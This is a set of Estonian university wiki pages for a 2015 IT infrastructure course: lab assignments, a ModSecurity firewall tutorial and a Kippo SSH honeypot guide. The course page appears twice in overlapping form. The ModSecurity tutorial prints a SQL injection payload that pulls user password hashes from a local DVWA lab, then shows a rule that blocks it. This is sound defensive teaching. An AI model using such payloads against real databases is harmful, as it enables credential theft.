*[[sqlmap]]
*[[Kippo SSH Honeypot]]
*[[p0f]] http://tools.kali.org/information-gathering/p0f
*[[hping]] http://www.hping.org/
*[[Yersinia]] - http://www.yersinia.net/
*[[WPScan]] - http://wpscan.org/
*[[Aircrack]]
*[[ntop]]
*[[Nikto]]
*[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>
*[[DigiNotar]]
*[[Ipkungfu Tulemüür]]
*[[iodine]]
*[[fabric]]
*[[mpstat]]
*[[arpwatch]]
*[[ss]]
*[[glances]]
*[[mod_status]]
*[[smoothwall]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
nano /etc/network/interfaces
<pre>
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</pre>

Taaskäivitage võrguliides '''eth1'''

ifdown eth1 && ifup eth1

Muutke DNS serveril hostinimi ns.sinudomeen.

echo ns > /etc/hostname

Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

Käivitage teenus '''hostname'''

service hostname start

Korraldus hostname -f peab tagastama FQDN-i

hostname -f

Seadistage ka [[OpenSSH:_võtmetega_autentimine| võtmetepõhine autentimine]].

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==

Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha [https://www.us-cert.gov/ncas/alerts/TA14-013A siin] kirjeldatud rünnet.

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS Näitelahendus 1]

[[Nimeserveri labor V.2| DNS Näitelahendus 2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimed peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme Wordpress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

Wordpress paigaldamine ja jõudluse testimine (varnish)
*[https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1 Wordpress paigaldamine]
**[[WordPress turvamine| Wordpress turvamine]]
**[http://wpdevshed.com/top-cache-plugins-wordpress/ Wordpress caching plugins]
**[[Varnish]]
***[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage [[DVWA]].

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

[[IDS_Systeemid_-_Labor_1| IDS Näitelahendus]]

[[Suricata| Abistav materjal]]

==Questid, millede eest saab punkte==

[https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing Quest 1 (Läbi ja tehtud)]

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Modsecurity

2015-05-30T13:00:15Z

Mernits:

= See sisu vajab uuendamist!!! =

<source lang="bash">
apt-get update
apt-get install libapache2-mod-security2
ln -s /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf /etc/modsecurity/
vim /etc/apache2/mods-available/security2.conf
</source>

<source lang="apache">
<IfModule security2_module>
# Default Debian dir for modsecurity's persistent data
SecDataDir /var/cache/modsecurity

# Include all the *.conf files in /etc/modsecurity.
# Keeping your local configuration in that directory
# will allow for an easy upgrade of THIS file and
# make your life easier
IncludeOptional /etc/modsecurity/*.conf
IncludeOptional /usr/share/modsecurity-crs/base_rules/*.conf
IncludeOptional /usr/share/modsecurity-crs/activated_rules/*.conf
# SecRuleEngine On
</IfModule>

</source>

apt-get install libapache2-mod-security2

== Autor ==

'''Aleksei Issaikin AK31'''

'''Pavel Kodotšigov AK31''' [[https://wiki.itcollege.ee/index.php/Modsecurity_j%C3%B5udlus ModSecurity jõudlus]]

Esimene versioon 19/05/2012

Viimati muudetud {{REVISIONDAY2}}/{{REVISIONMONTH}}/{{REVISIONYEAR}} {{REVISIONUSER}} 'i poolt. 

Timestamp ({{REVISIONTIMESTAMP}})

== Sissejuhatus ==

ModSecurity on tulemüür, mis on mõeldud '''Apache''' serveri peal jooksvate veebirakenduste kaitsmiseks. Tema peamiseks ülesanndeks on rünnakute ennetamine ja nende likvideerimine, enne kui nad jõuavad serveris jooksvate veebirakendusteni.

ModSercurity on võimeline monitoorima kogu '''http''' liiklust reaalajas ja avastama kõik võimalike sissetunge. [[File:Modsecurity.png‎ |400px|thumb|right|]]

'''Modsecurity mõned võimalused''':
<pre>
XSS rünnakute kaitse
SQL injection kaitse
CSRF kaitse
</pre>

'''Versioonide ajalugu:'''

<pre>
2.6.5
2.6.4
2.6.3
2.6.2
2.6.1
2.6.0
</pre>

== Eeldused ==

Serverisse peab olema paigaldatud '''Apache''' veebiserver.

Modsecurity testimiseks paigaldame ka testimisekeskkonna [[DVWA]].

Kõik toiminugd peavd käima juurkasutaja all, selleks logime ennast juurkasutajaga sisse käsuga:

<pre>sudo -i</pre>

== Tulemüüri allalaadimine ja installimine ==

Tulemüüri installimiseks tuleb sisestada käsureal käsu:

<pre>apt-get install libapache-mod-security</pre>

Järgmisena uuendame Modsecurity ruulid ära e. CRS.

Selleks kõigepealt laeme modsecurity ruulid alla:

<pre>wget http://downloads.sourceforge.net/project/mod-security/modsecurity-crs/0-CURRENT/modsecurity-crs_2.2.5.tar.gz</pre>

Pakkime lahti käsuga:

<pre>tar zxf modsecurity-crs_2.2.5.tar.gz</pre>

Kui lahtipakkimine õnnestus, tuleb lahtipakkitud kaustast kopeerida konfiguratsiooni fail ModSecurity kausta ja ümmber nimetada e. näiteks:

<pre>cp /root/modsecurity-crs_2.2.5/modsecurity_crs_10_setup.conf.example /etc/modsecurity/modsecurity_crs_10_setup.conf</pre>

Kindlasti tuleb veel teha apache teenusele restardi käsuga:

<pre>service apache2 restart</pre>

Kui paigaldamine õnnestus tuleb hakkata tulemüüri seadistama.

== Tulemüüri seadistamine ==

Kasutame suvlalist tekstiredaktorit ja loome '''mod_security''' konfiguratsiooni faili kausta '''/etc/apache2/conf.d/modsecurity2.conf''' käsuga:

<pre>nano /etc/apache2/conf.d/modsecurity2.conf</pre>

Tekkitatud faili lisame kirje tulemüüri reeglite sisse lülitamiseks:

<pre>< ifmodule mod_security2.c>
SecRuleEngine On
< /ifmodule></pre>

Edasi loome näiteks reegli, mis takistab ründega '''SQL injection''' küsida meie serveri andmebaasist DVWA kasutajate parooli hashe, kasutades argumenti '''union''':

Selleks lisame faili /etc/apache2/conf.d/modsecurity2.conf sellised read:

<pre><ifmodule mod_security2.c>
SecRuleEngine On
SecDefaultAction "phase:2,deny,log,status:403"
Secrule ARGS "union"
</ifmodule></pre>

Ehk, kui keegi üritab kasutada argumenti '''union''' blokitakse see kohe ära ja kuvatakse tõrge.

== Testimine ==

Testime alguses välja lülitatud tulemüüriga

Nagu eelnevalt sai mainitud kasutame ründe testimiseks tarkvara '''DVWA''', mis jookseb meie '''Apache''' serveris.
Võtame veebibrauseri kaudu lahti DVWA, aadressilt '''(https://127.0.0.1/dvwa)''' ja valime sealt '''SQL Injection''', sisestame lahtrisse '''ID''' käsu:

<pre>' union all select user, password from dvwa.users#</pre>

Seejärel vajutame klahvi '''Submit''', saame ilusti vastuseks kasutajate nimed ja nende paroolide hashid.

[[File:Pilt1_mod.jpg|400px]]

Lülitame sisse tulemüüri käsuga:

<pre>a2enmod mod-security</pre>

Teeme restardi Apache serverile käsuga:

<pre>service apache2 restart</pre>

Testime sisse lülitatud tulemüüriga eelnevat käsku kasutades, mille tulemusena saame vasutseks veateate.

[[File:Pilt2_mod.jpg]]

'''Tulemüür on valmis kasutamiseks.'''

Samamoodi erinevate reeglitega on võimalik kaitsa oma Apache veebiserverit erinevate rünnakute eest.

== Konfiguratsiooni faili varundamine ==

Kuna tulemüüri reeglite tegemine on ajanõudev tegevus, tuleks konfiguratsiooni fail serveris varundada käsuga:

<pre>cp /etc/apache2/conf.d/modsecurity2.conf /root/backup/modsecurity/</pre>

== Konfiguratsiooni faili taastamine ==

Kui teenus ei tööta korralikult või on vajalik se uuesti installida, siis konfiguratsiooni faili on võimalik taastada käsuga:

<pre>cp /root/backup/modsecurity/modsecurity2.conf /etc/apache2/conf.d/</pre>

== Kasutatud materjal ==

<ol>
<li>http://kiranjith83.blogspot.com/2010/12/installing-and-configuring-modsecurity.html</li>
<li>http://www.sans.org/reading_room/whitepapers/webservers/web-application-firewall-detect-block-common-web-application-attacks_33831</li>
</ol>
[[Category:IT infrastruktuuri teenused]]

Kippo SSH Honeypot

2015-05-21T07:29:03Z

Mernits:

=Autor=
Nimi: Anastasia Osadtsaja 
Rühm: A21

=Sissejuhatus=
Kippo Honeypot on SSH serveri imiteerimine. Eesmärk on panna arvama ründajat, et tegu on süsteemiga, kust saab ligi failidele. Kippo võlts failisüsteemis on võimalik lisada ja kustutada. Ründaja toiminguid logitakse. 
Kippot saab paigaldada mis tahes masinale, mis vastavad järgmistele nõuetele: [1][2] 
Python 2.5+ 
Twisted 8.0+ 
PyCrypto 
Zope Interface 

=Install=

Järgnevad käsud on mõeldud Debian, Ubuntu, Linux Mint süsteemidele.

Vajalike pakkide install: [1]
<pre>$ sudo apt-get update && apt-get install python-twisted</pre>

Esimesel katsel proovivad ründajad port 22, seega tuleb konfiguratsioonis teha kerged muudatused. [1]
<pre># nano /etc/ssh/ssh_config</pre>

Konfiguratsioonis muuta port 22 näiteks 2002. Salvestada muudatus ja lahkuda failist. [1]
<pre>Host *
...
# Port 2002</pre>

Muudatuste toimimiseks taaskäivitada teenus. [1]
<pre># service ssh restart</pre>

Muudatuste kontrollimine: [2]
<pre># netstat -ant | grep 2002
tcp 0 0 0.0.0.0:2002 0.0.0.0:* LISTEN</pre>

Lisada uus kasutaja kippo ja logida sisse loodud kasutajana. [1]
<pre># adduser kippo</pre>

Installida uusim Kippo pakk (https://github.com/desaster/kippo) [1]
<pre>$ wget http://kippo.googlecode.com/files/kippo-0.8.tar.gz</pre>

Allalaetud pakk lahti pakkida. [1]
<pre>$ tar xzf kippo-0.8.tar.gz</pre>

Lahti pakkimisel luuakse kataloog kippo-0.8, [1]
<pre>$ ls kippo-0.8</pre>

mille sees on: [1]
<pre>data dl doc fs.pickle honeyfs kippo kippo.cfg kippo.tac log start.sh txtcmds utils</pre>
dl – failid mis laeti alla wget-iga. 
log/kippo.log – log/debug väljund. 
log/tty/ – sessioni logid. 
utils/playlog.py – utiliidid, et vastata sessiooni logidele. 
utils/createfs.py – vajalik fs.pickle loomiseks. 
fs.pickle – võlts failisüsteem. 
honeyfs/ – kataloog, mis hoiab endast võlts faile. 

Järgnevat käsku sisestada juurkasutajas. Vaikimisi on Kippo port 2002, käsuga suunatakse SSH 22 liiklus Kippo 2002 porti. [1]
<pre># iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2002 </pre>

=Kippo käivitamine=

<pre>$ cd kippo-0.8/
$ ./start.sh
Starting kippo in background...Generating RSA keypair...
done.</pre>

SSH-ga ühenduse loomine. [1]
<pre>$ ssh <kasutaja>@<IP></pre>

Vaikimisi on Kippo parool 123456. [1]
<pre>Password:</pre>

=Kasulikud tegevused=
Parooli muutmine. Uueks juurkasutaja parooliks saab näiteks password. [1]
<pre>kippo@server:~/kippo-0.8$ utils/passdb.py data/pass.db add password</pre>
Vaikimisi on hostname nas3, soovitatav oleks hostname muuta. Muutmiseks tuleb avada kippo.cfg fail. [1]
<pre>$ nano kippo.cfg</pre>
Uus hostname on server. [1]
<pre>[...]
# (default: nas3)
hostname = server
[...]</pre>

=Logide kontrollimine=
Logisid hoitakse kippo kataloogis. <ref>http://www.unixmen.com/kippo-ssh-honeypot-monitor-brute-force-attacks-debian-7-ubuntu-13-10/</ref>
<pre>$ cat log/kippo.log</pre>

=Kokkuvõte=
Soovitatav on Kippot kasutada virutaalmasinal, millel on tulemüür, kuna ta on tundlik DoS rünnakutele.
Eelnevalt tehtud konfiguratsioonid ja installatsioonid, aitavad mõista kuidas ründajad tegutsevad: kuidas ründavad ja mida üritavad teha. [1][2]

=Kasutatud kirjandus=

<references />

[1] http://www.unixmen.com/kippo-ssh-honeypot-monitor-brute-force-attacks-debian-7-ubuntu-13-10/ 
[2] http://how-to.linuxcareer.com/deployment-of-kippo-ssh-honeypot-on-ubuntu-linux

Category:I375/I803/I853 IT Infrastructure services

2015-05-21T06:39:16Z

Mernits: /* ReferaadiTeemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

= ReferaadiTeemad 2015 =

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[Kippo SSH Honeypot]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

[[Yersinia]] - http://www.yersinia.net/

[[WPScan]] - http://wpscan.org/

[[Aircrack]]

[[ntop]]

[[Nikto]]

[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>

[[DigiNotar]]

[[Ipkungfu Tulemüür]]

[[iodine]]

[[fabric]]

[[mpstat]]

[[arpwatch]]

[[ss]]

[[glances]]

[[mod_status]]

[[smoothwall]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

